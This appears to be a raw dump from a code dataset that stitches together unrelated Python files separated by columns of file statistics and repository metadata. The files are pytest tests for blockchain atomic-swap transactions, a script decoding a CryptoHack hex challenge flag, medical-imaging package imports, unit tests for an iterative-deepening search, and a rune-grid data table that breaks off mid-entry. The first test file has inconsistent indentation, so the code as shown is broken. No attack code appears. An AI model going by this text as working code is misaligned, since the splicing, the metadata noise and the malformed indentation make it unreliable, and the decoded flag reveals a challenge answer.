token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_eth_pubkeys(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError if pubkeys are present on Ethereum case."""
self.ledger_api.identifier = "ethereum"
# Test if get_atomic_swap_single_transaction returns RuntimeError when pubkey is present
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_signature(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError if signature is present on Cosmos/Fetch case."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction returns RuntimeError when signature is present
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_one_pubkey_valid(self):
"""Test if get_atomic_swap_single_transaction allows one pubkey in case of only one direction of transfers."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction works with only to_pubkey
tx = self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=0,
to_supply=1,
value=1,
trade_nonce=0,
to_pubkey="deadbeef",
)
assert tx is not None
    @pytest.mark.ledger
    def test_get_atomic_swap_single_transaction_cosmos_one_pubkey_invalid(self):
        """Test if get_atomic_swap_single_transaction returns RuntimeError with missing from_pubkey."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_single_transaction fails with missing from_pubkey
        # (from_supply > 0 means the "from" side transfers, so its pubkey is required)
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_single_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_id=self.token_ids_a[0],
                from_supply=1,
                to_supply=0,
                value=1,
                trade_nonce=0,
                to_pubkey="deadbeef",
            )
    @pytest.mark.ledger
    def test_get_atomic_swap_single_transaction_cosmos_to_pubkey_missing(self):
        """Test if get_atomic_swap_single_transaction returns RuntimeError with missing to_pubkey."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_single_transaction fails with missing to_pubkey
        # (value > 0 means the "to" side participates, so its pubkey is required)
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_single_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_id=self.token_ids_a[0],
                from_supply=1,
                to_supply=0,
                value=1,
                trade_nonce=0,
                from_pubkey="deadbeef",
            )
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_eth_pubkeys(self):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError if pubkeys are present on Ethereum case."""
self.ledger_api.identifier = "ethereum"
# Test if get_atomic_swap_batch_transaction returns RuntimeError when pubkey is present
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_signature(self):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError if signature is present on Cosmos/Fetch case."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_batch_transaction returns RuntimeError when signature is present
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_one_pubkey_valid(self):
"""Test if get_atomic_swap_batch_transaction allows one pubkey in case of only one direction of transfers."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_batch_transaction works with only to_pubkey
tx = self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[0],
to_supplies=[1],
value=1,
trade_nonce=0,
to_pubkey="deadbeef",
)
assert tx is not None
    @pytest.mark.ledger
    def test_get_atomic_swap_batch_transaction_cosmos_one_pubkey_invalid(self):
        """Test if get_atomic_swap_batch_transaction returns RuntimeError with missing from_pubkey."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_batch_transaction fails with missing from_pubkey
        # (from_supplies > 0 means the "from" side transfers, so its pubkey is required)
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_batch_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_ids=[self.token_ids_a[0]],
                from_supplies=[1],
                to_supplies=[0],
                value=1,
                trade_nonce=0,
                to_pubkey="deadbeef",
            )
    @pytest.mark.ledger
    def test_get_atomic_swap_ba_transaction_eth_no_signature(self):
        """Test if get_atomic_swap_batch_transaction returns RuntimeError if signature not present on Ethereum case."""
        # NOTE(review): "ba" in the test name looks like a typo for "batch".
        self.ledger_api.identifier = "ethereum"
        # Test if get_atomic_swap_batch_transaction returns RuntimeError when signature is missing
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_batch_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_ids=[self.token_ids_a[0]],
                from_supplies=[1],
                to_supplies=[0],
                value=1,
                trade_nonce=0,
            )
    @pytest.mark.ledger
    def test_get_atomic_swap_batch_transaction_cosmos_to_pubkey_missing(self):
        """Test if get_atomic_swap_batch_transaction returns RuntimeError with missing to_pubkey."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_batch_transaction fails with missing to_pubkey
        # (value > 0 means the "to" side participates, so its pubkey is required)
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_batch_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_ids=[self.token_ids_a[0]],
                from_supplies=[1],
                to_supplies=[0],
                value=1,
                trade_nonce=0,
                from_pubkey="deadbeef",
            )
    @pytest.mark.ledger
    def test_get_atomic_swap_batch_transaction_cosmos_to_pubkey_missing_no_from_pubkey_required(
        self,
    ):
        """Test if get_atomic_swap_batch_transaction returns RuntimeError with missing to_pubkey and from_pubkey not required."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_batch_transaction fails with missing to_pubkey
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_batch_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_ids=[self.token_ids_a[0]],
                from_supplies=[0],
                to_supplies=[1],
                value=1,
                trade_nonce=0,
            )
    @pytest.mark.ledger
    def test_get_atomic_swap_batch_transaction_cosmos_from_pubkey_missing_no_to_pubkey_required(
        self,
    ):
        """Test if get_atomic_swap_batch_transaction returns RuntimeError with missing from_pubkey and to_pubkey not required."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_batch_transaction fails with missing from_pubkey
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_batch_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_ids=[self.token_ids_a[0]],
                from_supplies=[1],
                to_supplies=[0],
                value=0,
                trade_nonce=0,
            )
    @pytest.mark.ledger
    def test_get_atomic_swap_batch_transaction_cosmos_from_pubkey_only(self):
        """Test if get_atomic_swap_batch_transaction returns Tx in case with only from_pubkey."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_batch_transaction works with only from_pubkey
        # (value == 0 and to_supplies == [0] mean the "to" side is idle, so to_pubkey is not needed)
        res = self.contract.get_atomic_swap_batch_transaction(
            self.ledger_api,
            contract_address="address",
            from_address="address",
            to_address="address",
            token_ids=[self.token_ids_a[0]],
            from_supplies=[1],
            to_supplies=[0],
            value=0,
            trade_nonce=0,
            from_pubkey="deadbeef",
        )
        assert res is not None
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_amounts_missing(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing amounts."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with all amounts to be zero
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=0,
to_supply=0,
value=0,
trade_nonce=0,
from_pubkey="deadbeef",
)
    @pytest.mark.ledger
    def test_get_atomic_swap_batch_transaction_amounts_missing(self):
        """Test if get_atomic_swap_batch_transaction returns RuntimeError with missing amounts."""
        self.ledger_api.identifier = "fetchai"
        # Test if get_atomic_swap_batch_transaction fails with all amounts being zero
        with pytest.raises(RuntimeError):
            self.contract.get_atomic_swap_batch_transaction(
                self.ledger_api,
                contract_address="address",
                from_address="address",
                to_address="address",
                token_ids=[self.token_ids_a[0]],
                from_supplies=[0],
                to_supplies=[0],
                value=0,
                trade_nonce=0,
                from_pubkey="deadbeef",
            )
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_to_pubkey_missing_no_from_pubkey_required(
self,
):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing to_pubkey and from_pubkey not required."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing to_pubkey
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=0,
to_supply=1,
value=1,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_from_pubkey_missing_no_to_pubkey_required(
self,
):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing from_pubkey and to_pubkey not required."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing from_pubkey
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=0,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_from_pubkey_only(self):
"""Test if get_atomic_swap_single_transaction returns Tx in case with only from_pubkey."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction works with only from_pubkey
res = self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=0,
trade_nonce=0,
from_pubkey="deadbeef",
)
assert res is not None
| 37.45818
| 130
| 0.619075
| 6,780
| 60,907
| 5.24233
| 0.05118
| 0.046085
| 0.046817
| 0.045916
| 0.864277
| 0.846665
| 0.832119
| 0.825395
| 0.803759
| 0.793433
| 0
| 0.049814
| 0.300934
| 60,907
| 1,625
| 131
| 37.481231
| 0.784959
| 0.147848
| 0
| 0.727929
| 0
| 0
| 0.042251
| 0.002917
| 0
| 0
| 0
| 0
| 0.065811
| 1
| 0.043339
| false
| 0
| 0.009631
| 0
| 0.060995
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38ebf8e80583acc6965a03a1e2012ec42ff74356
| 159
|
py
|
Python
|
encoding/hex.py
|
ruarfff/cryptohack
|
9ef672a5e2681104a1f2778982b4b7d60817e33e
|
[
"MIT"
] | null | null | null |
encoding/hex.py
|
ruarfff/cryptohack
|
9ef672a5e2681104a1f2778982b4b7d60817e33e
|
[
"MIT"
] | null | null | null |
encoding/hex.py
|
ruarfff/cryptohack
|
9ef672a5e2681104a1f2778982b4b7d60817e33e
|
[
"MIT"
] | null | null | null |
# CryptoHack "hex" challenge: the flag is stored as a hex string; decode and print it.
hex_str = '63727970746f7b596f755f77696c6c5f62655f776f726b696e675f776974685f6865785f737472696e67735f615f6c6f747d'
decoded = bytes.fromhex(hex_str)
print(decoded.decode('utf-8'))
| 53
| 112
| 0.886792
| 11
| 159
| 12.636364
| 0.818182
| 0.086331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.522581
| 0.025157
| 159
| 2
| 113
| 79.5
| 0.374194
| 0
| 0
| 0
| 0
| 0
| 0.660377
| 0.628931
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
ac138986e0ecd1f41f3649d7848bcd4c83562b71
| 153
|
py
|
Python
|
medimodule/Abdomen/models/__init__.py
|
cuchoco/MI2RLNet
|
4ef84e641705df9b10e627c701eb0c9ed924a82a
|
[
"Apache-2.0"
] | 9
|
2021-02-25T23:10:17.000Z
|
2022-02-14T11:48:11.000Z
|
medimodule/Abdomen/models/__init__.py
|
cuchoco/MI2RLNet
|
4ef84e641705df9b10e627c701eb0c9ed924a82a
|
[
"Apache-2.0"
] | null | null | null |
medimodule/Abdomen/models/__init__.py
|
cuchoco/MI2RLNet
|
4ef84e641705df9b10e627c701eb0c9ed924a82a
|
[
"Apache-2.0"
] | 7
|
2021-02-22T12:20:24.000Z
|
2022-03-07T04:56:53.000Z
|
from .liver_seg import LiverSeg
from .polyp_det import PolypDet
from .kidney_tumor_seg import KidneyTumorSeg
from .kidney_tumor_seg import KidneyUtils
| 38.25
| 45
| 0.856209
| 22
| 153
| 5.681818
| 0.545455
| 0.216
| 0.24
| 0.288
| 0.384
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 153
| 4
| 46
| 38.25
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ac2a32f16e20ad75230ab2d9f8a9248c96c54043
| 8,216
|
py
|
Python
|
iterative_deepening_test.py
|
zhangcshcn/Generic-Iterative-Deepening
|
a03c2b8764a5b113144371a5c285f31d5850c84b
|
[
"MIT"
] | 2
|
2018-02-20T01:27:25.000Z
|
2018-02-28T10:54:45.000Z
|
iterative_deepening_test.py
|
zhangcshcn/Generic-Iterative-Deepening
|
a03c2b8764a5b113144371a5c285f31d5850c84b
|
[
"MIT"
] | 1
|
2018-03-01T05:44:43.000Z
|
2018-03-01T05:44:43.000Z
|
iterative_deepening_test.py
|
zhangcshcn/Generic-Iterative-Deepening
|
a03c2b8764a5b113144371a5c285f31d5850c84b
|
[
"MIT"
] | 1
|
2020-10-06T04:42:13.000Z
|
2020-10-06T04:42:13.000Z
|
#! /usr/bin/python2
# -*- coding: utf-8 -*-
import unittest
from iterative_deepening import State, Searchable, IterativeDeepening
class TreeNode(object):
    """A minimal binary-tree node holding an integer value and two child links."""

    def __init__(self, val=0):
        self.val = val
        # Children start out absent; callers attach them explicitly.
        self.left = self.right = None
class TreeState(State):
    """Search state wrapping a TreeNode (payload in ``state``, path in ``history``)."""
    def __init__(self, state, history=None):
        # Pure pass-through to the base State; presumably exists for naming clarity.
        super(TreeState, self).__init__(state, history)
class TreeSpace(Searchable):
    """A Searchable over a binary tree; the goal is a node whose value equals ``target``."""

    def __init__(self, root, target=0):
        super(TreeSpace, self).__init__(root)
        self.target = target

    def Neighbors(self, state):
        """Return child states, left before right, skipping absent children."""
        node = state.state
        return [TreeState(child) for child in (node.left, node.right) if child]

    def Assert(self, state):
        """Goal test: non-None state whose node value matches the target."""
        if state is None:
            return False
        return state.state.val == self.target
class TreeTest(unittest.TestCase):
    """Exercise IterativeDeepening's BFS, DFS, Search and IterativeDeepening
    entry points on a complete 15-node binary tree (values 0..14).

    Error-code convention asserted throughout: 0 = target found,
    1 = space exhausted without a hit, 2 = queue/state budget exceeded.
    """
    def setUp(self):
        # Build a complete binary tree where node i has children 2i+1 and 2i+2.
        # range (not the Python-2-only xrange) keeps this runnable on Python 2 and 3.
        self.root = TreeNode(0)
        queue = [self.root]
        for i in range(7):
            node = queue.pop(0)
            node.left = TreeNode(2*i + 1)
            node.right = TreeNode(2*i + 2)
            queue += [node.left, node.right]
    def testBFSErr0(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=8,
            max_states_num=16)
        sol, err = solver.BFS()
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertSequenceEqual(
            [5, 6, 7, 8, 9],
            [i.state.val for i in solver.bfs_queue])
        self.assertEqual(10, solver.num_states_seen)
    def testBFSErr1(self):
        target = 17
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=8,
            max_states_num=16)
        sol, err = solver.BFS()
        self.assertEqual(None, sol)
        self.assertEqual(1, err)
        self.assertSequenceEqual([], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(14, solver.num_states_seen)
    def testBFSErr2A(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=2,
            max_states_num=16)
        sol, err = solver.BFS()
        self.assertEqual(None, sol)
        self.assertEqual(2, err)
        self.assertSequenceEqual([1, 2], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(2, solver.num_states_seen)
    def testBFSErr2B(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=8,
            max_states_num=9)
        sol, err = solver.BFS()
        self.assertEqual(None, sol)
        self.assertEqual(2, err)
        self.assertSequenceEqual(
            [5, 6, 7, 8, 9],
            [i.state.val for i in solver.bfs_queue])
        self.assertEqual(9, solver.num_states_seen)
    def testDFSErr0A(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=8,
            max_states_num=16)
        sol, err = solver.DFS(tree_space.start_point)
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertEqual(8, solver.num_states_seen)
    def testDFSErr0B(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(tree_space)
        sol, err = solver.DFS(tree_space.start_point, 3)
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertEqual(8, solver.num_states_seen)
    def testDFSErr1A(self):
        target = 17
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(tree_space)
        sol, err = solver.DFS(tree_space.start_point)
        self.assertEqual(None, sol)
        self.assertEqual(1, err)
        self.assertEqual(14, solver.num_states_seen)
    def testDFSErr1B(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(tree_space)
        sol, err = solver.DFS(tree_space.start_point, 2)
        self.assertEqual(None, sol)
        self.assertEqual(1, err)
        self.assertEqual(6, solver.num_states_seen)
    def testDFSErr2(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space, max_states_num=7)
        sol, err = solver.DFS(tree_space.start_point)
        self.assertEqual(None, sol)
        self.assertEqual(2, err)
        self.assertEqual(7, solver.num_states_seen)
    def testIterativeDeepeningErr0(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space, max_states_num=10)
        sol, err = solver.IterativeDeepening([tree_space.start_point])
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertEqual(10, solver.num_states_seen)
    def testIterativeDeepeningErr1(self):
        target = 16
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space, max_states_num=16)
        sol, err = solver.IterativeDeepening([tree_space.start_point])
        self.assertEqual(None, sol)
        self.assertEqual(1, err)
        self.assertEqual(14, solver.num_states_seen)
    def testIterativeDeepeningErr2(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space, max_states_num=9)
        sol, err = solver.IterativeDeepening([tree_space.start_point])
        self.assertEqual(None, sol)
        self.assertEqual(2, err)
        self.assertEqual(9, solver.num_states_seen)
    def testSearchErr0A(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=3,
            max_states_num=16)
        sol, err = solver.Search()
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertSequenceEqual([2, 3, 4], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(10, solver.num_states_seen)
    def testSearchErr0B(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=8,
            max_states_num=16)
        sol, err = solver.Search()
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertSequenceEqual([5, 6, 7, 8, 9], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(10, solver.num_states_seen)
    def testSearchErr0C(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=0,
            max_states_num=16)
        sol, err = solver.Search()
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertSequenceEqual([0], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(10, solver.num_states_seen)
    def testSearchErr0D(self):
        target = 10
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=1,
            max_states_num=16)
        sol, err = solver.Search()
        self.assertEqual(target, sol.state.val)
        self.assertEqual(0, err)
        self.assertSequenceEqual([0], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(10, solver.num_states_seen)
    def testSearchErr1(self):
        target = 17
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=3,
            max_states_num=16)
        sol, err = solver.Search()
        self.assertEqual(None, sol)
        self.assertEqual(1, err)
        self.assertSequenceEqual([2, 3, 4], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(14, solver.num_states_seen)
    def testSearchErr2(self):
        target = 17
        tree_space = TreeSpace(TreeState(self.root), target)
        solver = IterativeDeepening(
            tree_space,
            max_queue_size=3,
            max_states_num=9)
        sol, err = solver.Search()
        self.assertEqual(None, sol)
        self.assertEqual(2, err)
        self.assertSequenceEqual([2, 3, 4], [i.state.val for i in solver.bfs_queue])
        self.assertEqual(9, solver.num_states_seen)
# Run the test suite when this file is executed directly.
if __name__ == "__main__":
    unittest.main()
| 31.358779
| 86
| 0.682084
| 1,073
| 8,216
| 5.055918
| 0.092265
| 0.149309
| 0.108387
| 0.127742
| 0.824332
| 0.801843
| 0.801843
| 0.800922
| 0.791705
| 0.791705
| 0
| 0.027213
| 0.203871
| 8,216
| 261
| 87
| 31.478927
| 0.802171
| 0.004869
| 0
| 0.703057
| 0
| 0
| 0.000979
| 0
| 0
| 0
| 0
| 0
| 0.283843
| 1
| 0.104803
| false
| 0
| 0.008734
| 0.004367
| 0.139738
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bd3c30800bb11b1710e42cecc040ea087e90d92
| 5,654
|
py
|
Python
|
Quantum_Procedural_Generation/runes.py
|
quantumjim/blog
|
bf371b82a8f61b68ee1a503496e4632cac04ce1f
|
[
"Apache-2.0"
] | 4
|
2019-10-16T07:16:53.000Z
|
2019-12-28T18:28:24.000Z
|
Quantum_Procedural_Generation/runes.py
|
quantumjim/blog
|
bf371b82a8f61b68ee1a503496e4632cac04ce1f
|
[
"Apache-2.0"
] | null | null | null |
Quantum_Procedural_Generation/runes.py
|
quantumjim/blog
|
bf371b82a8f61b68ee1a503496e4632cac04ce1f
|
[
"Apache-2.0"
] | 1
|
2019-12-09T19:37:06.000Z
|
2019-12-09T19:37:06.000Z
|
runes=[{(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 1, (1, 4): 1, (1, 5): 1, (1, 6): 1, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 1, (2, 3): 1, (2, 4): 1, (2, 5): 1, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 1, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 0, (4, 3): 0, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 1, (5, 3): 1, (5, 4): 0, (5, 5): 1, (5, 6): 1, (5, 7): 1, (6, 0): 0, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 1, (1, 4): 1, (1, 5): 0, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 1, (2, 5): 1, (2, 6): 0, (2, 7): 1, (3, 0): 1, (3, 1): 1, (3, 2): 1, (3, 3): 0, (3, 4): 1, (3, 5): 0, (3, 6): 1, (3, 7): 0, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 0, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 1, (5, 3): 0, (5, 4): 1, (5, 5): 0, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 0, (6, 3): 1, (6, 4): 1, (6, 5): 1, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 0, (1, 2): 1, (1, 3): 1, (1, 4): 0, (1, 5): 1, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 0, (2, 2): 1, (2, 3): 0, (2, 4): 1, (2, 5): 0, (2, 6): 0, (2, 7): 1, (3, 0): 0, (3, 1): 0, (3, 2): 0, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 0, (5, 3): 0, (5, 4): 1, (5, 5): 1, (5, 6): 0, (5, 7): 1, (6, 0): 0, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 
